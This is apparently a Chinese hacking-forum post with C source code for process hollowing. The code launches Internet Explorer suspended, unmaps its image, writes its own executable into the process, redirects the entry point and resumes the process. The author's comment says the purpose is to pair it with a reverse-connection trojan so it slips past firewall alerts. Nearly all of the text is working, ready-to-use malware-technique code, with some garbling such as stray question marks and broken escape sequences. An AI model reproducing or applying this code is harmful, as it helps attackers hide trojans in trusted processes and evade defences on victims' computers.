????? 直接將自身代碼注入傀儡進程，不需要DLL。首先用CreateProcess來創建一個掛起的IE進程，創建時候就把它掛起。然后得到它的裝載基址，使用函數ZwUnmapViewOfSection來卸載這個這個基址內存空間的數據，。再用VirtualAllocEx來個ie進程重新分配內存空間，大小為要注入程序的大小(就是自身的imagesize)。使用WriteProcessMemory重新寫IE進程的基址，就是剛才分配的內存空間的地址。再用WriteProcessMemory把自己的代碼寫入IE的內存空間。用SetThreadContext設置下進程狀態，最后使用ResumeThread繼續運行IE進程。

/*********************************************************************?
?? Author: Polymorphours?
?? Date: 2005/1/10

?? 另一種將自己代碼注入傀儡進程的方法，配合反彈木馬，可繞過防火墻的?
?? 反向連接報警。?
**********************************************************************/

#include <stdio.h>?
#include <windows.h>

BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr);??

typedef struct _ChildProcessInfo {

DWORD dwBaseAddress;?
DWORD dwReserve;?
} CHILDPROCESS, *PCHILDPROCESS;

BOOL?
FindIePath(?
char *IePath,?
int *dwBuffSize?
);?

BOOL InjectProcess(void);

DWORD?
GetSelfImageSize(?
HMODULE hModule?
);

BOOL?
CreateInjectProcess(?
PPROCESS_INFORMATION pi,?
PCONTEXT pThreadCxt,?
CHILDPROCESS *pChildProcess?
);

char szIePath[MAX_PATH];

int main(void)?
{?
if (InjectProcess() )?
{?
?? printf("This is my a test code,made by (Polymorphours)shadow3./r/n");?
}?
else?
{?
?? MessageBox(NULL,"進程插入完成","Text",MB_OK);?
}?
return 0;?
}

BOOL FindIePath(OUT char *IePath, OUT int *dwBuffSize)?
{?
char szSystemDir[MAX_PATH];?
GetSystemDirectory(szSystemDir,MAX_PATH);?

szSystemDir[2] = '/0';?
lstrcat(szSystemDir,"//Program?Files//Internet Explorer//iexplore.exe");?
lstrcpy(IePath, szSystemDir);?
return TRUE;?
}

BOOL InjectProcess(void)?
{?
char szModulePath[MAX_PATH];?
DWORD dwImageSize = 0;?

STARTUPINFO si;?
PROCESS_INFORMATION pi;?
CONTEXT ThreadCxt;?
DWORD *PPEB;?
DWORD dwWrite = 0;?
CHILDPROCESS stChildProcess;?
LPVOID lpVirtual = NULL;?
PIMAGE_DOS_HEADER pDosheader = NULL;?
PIMAGE_NT_HEADERS pVirPeHead = NULL;?

HMODULE hModule = NULL;?

ZeroMemory( szModulePath, MAX_PATH );?
ZeroMemory( szIePath, MAX_PATH );?

GetModuleFileName( NULL, szModulePath, MAX_PATH );?
FindIePath( szIePath, NULL );?

if ( lstrcmpiA( szIePath, szModulePath ) == 0 )
{ //當前運行在IE空間里
?? return FALSE;?
}?

hModule = GetModuleHandle( NULL );?
if ( hModule == NULL )?
{?
?? return FALSE;?
}?

pDosheader = (PIMAGE_DOS_HEADER)hModule;?
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);?

dwImageSize = GetSelfImageSize(hModule);?

// 以掛起模式啟動一個傀儡進程,這里為了傳透防火墻，使用IE進程?
if ( CreateInjectProcess(&pi, &ThreadCxt, &stChildProcess ))
{?
?? printf("CHILD PID: [%d]/r/n",pi.dwProcessId);?
?? // 卸載需要注入進程中的代碼?
?? if( UnloadShell(pi.hProcess, stChildProcess.dwBaseAddress) )
?? {?
??? // 重新分配內存?
??? lpVirtual = VirtualAllocEx(?
???? pi.hProcess,?
???? (LPVOID)hModule,?
???? dwImageSize,?
???? MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);?
???
??? if( lpVirtual )?
??? {?
???? printf("Unmapped and Allocated Mem Success./r/n");?
??? }
?? }?
?? else?
?? {?
??? printf("ZwUnmapViewOfSection() failed./r/n");?
??? return TRUE;?
?? }?
??
?? if(lpVirtual)?
?? {?
??? PPEB = (DWORD *)ThreadCxt.Ebx;?
??? // 重寫裝載地址?
??? WriteProcessMemory(?
???? pi.hProcess,?
???? &PPEB[2],?
???? &lpVirtual,?
???? sizeof(DWORD),?
???? &dwWrite);?
???
??? // 寫入自己進程的代碼到目標進程?
??? if ( WriteProcessMemory(?
???? pi.hProcess,?
???? lpVirtual,?
???? hModule,?
???? dwImageSize,?
???? &dwWrite) )?
??? {?
???? printf("image inject into process success./r/n");?
????
???? ThreadCxt.ContextFlags = CONTEXT_FULL;?
???? if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress )?
???? {?
????? ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;?
???? }?
???? else?
???? {?
????? ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;?
???? }?
#ifdef DEBUG?
???? printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax);?
???? printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx);?
???? printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx);?
???? printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx);?
???? printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip);?
#endif?
???? SetThreadContext(pi.hThread, &ThreadCxt);?
???? ResumeThread(pi.hThread);?
??? }?
??? else?
??? {?
???? printf("WirteMemory Failed,code:%d/r/n",GetLastError());?
???? TerminateProcess(pi.hProcess, 0);?
??? }?
?? }?
?? else?
?? {?
??? printf("VirtualMemory Failed,code:%d/r/n",GetLastError());?
??? TerminateProcess(pi.hProcess, 0);?
?? }?
}?
return TRUE;?
}

DWORD GetSelfImageSize(HMODULE hModule)?
{?
DWORD dwImageSize;?
_asm?
{?
?? mov ecx,0x30?
?? mov eax, fs:[ecx]?
?? mov eax, [eax + 0x0c]?
?? mov esi, [eax + 0x0c]?
?? add esi,0x20?
?? lodsd?
?? mov dwImageSize,eax?
}?
return dwImageSize;?
}

BOOL CreateInjectProcess(?
?????? PPROCESS_INFORMATION pi,?
?????? PCONTEXT pThreadCxt,?
?????? CHILDPROCESS *pChildProcess )?
{?
STARTUPINFO si;?

DWORD *PPEB;?
DWORD read;?

// 使用掛起模式啟動ie?
if( CreateProcess(?
?? NULL,?
?? szIePath,?
?? NULL,?
?? NULL,?
?? 0,?
?? CREATE_SUSPENDED,?
?? NULL,?
?? NULL,?
?? &si,?
?? pi ))?
{?
?? pThreadCxt->ContextFlags = CONTEXT_FULL;?
?? GetThreadContext(pi->hThread, pThreadCxt);?
??
?? PPEB = (DWORD *)pThreadCxt->Ebx;?
?? // 得到ie的裝載基地址?
?? ReadProcessMemory(?
??? pi->hProcess,?
??? &PPEB[2],?
??? (LPVOID)&(pChildProcess->dwBaseAddress),?
??? sizeof(DWORD),?
??? &read );?
??
?? return TRUE;?
}?
return FALSE;?
}

BOOL UnloadShell(HANDLE ProcHnd, unsigned long BaseAddr)???
{???
??? typedef unsigned long (__stdcall *pfZwUnmapViewOfSection)(unsigned long, unsigned long);???
??? pfZwUnmapViewOfSection ZwUnmapViewOfSection = NULL;?

??? BOOL res = FALSE;???
??? HMODULE m = LoadLibrary("ntdll.dll");???
??? if(m)
{???
??????? ZwUnmapViewOfSection = (pfZwUnmapViewOfSection)GetProcAddress(m, "ZwUnmapViewOfSection");???
??????? if(ZwUnmapViewOfSection)???
??????????? res = (ZwUnmapViewOfSection((unsigned long)ProcHnd, BaseAddr) == 0);???
??????? FreeLibrary(m);???
??? }???
??? return res;?
}